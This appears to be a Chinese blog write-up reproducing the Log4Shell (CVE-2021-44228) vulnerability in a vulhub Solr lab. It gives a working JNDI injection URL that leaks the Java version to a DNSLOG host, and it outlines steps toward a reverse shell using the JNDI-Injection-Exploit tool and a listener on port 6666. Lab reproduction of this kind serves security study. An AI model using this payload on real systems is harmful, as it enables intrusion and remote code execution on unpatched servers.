vulhub log4j2 CVE-2021-44228漏洞复现

1.开启环境

2.访问靶场

3.可以发现 /solr/admin/cores?action= 这⾥有个参数可以传,先构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的版本号!

可以访问到我们Java的版本,所以说明此处存在命令执行漏洞

复制代码
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.ir3n8l.dnslog.cn}

4.开始反弹shell

但是此处需要JNDI-Injection-Exploit

JNDI项目地址:

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

5.准备payload,并进行base64加密

6.将此payload复制到模版中,变为最终payload

在kali进行最终payload的运行,会获得一串有jndi生成的payload

7.监听6666端口

然后使用这条命令在log4j2中运行

8.最终会在监听处反弹回shell

相关推荐
凭君语未可3 天前
详解Maven的主要生命周期
java·log4j·maven
WIN赢4 天前
单元测试的编写
单元测试·log4j
zerohawk7 天前
【log4j】配置Slf4j
junit·单元测试·log4j
熬了夜的程序员9 天前
Go 语言封装邮件发送功能
开发语言·后端·golang·log4j
故事与他64511 天前
Apache中间件漏洞攻略
java·服务器·安全·网络安全·中间件·log4j·apache
江沉晚呤时13 天前
精益架构设计:深入理解与实践 C# 中的单一职责原则
java·jvm·算法·log4j·.netcore·net
为美好的生活献上中指14 天前
java每日精进 3.21 【SpringBoot规范2.0】
java·开发语言·spring boot·log4j·async·mail
-$_$-15 天前
【MyDB】5-索引管理之4-单元测试
单元测试·log4j
爱的叹息18 天前
java自带日志系统介绍(JUL)以及和Log4j 2、Logback、SLF4J不同日志工具的对比
java·log4j·logback
热心小张24 天前
Springboot单元测试
spring boot·单元测试·log4j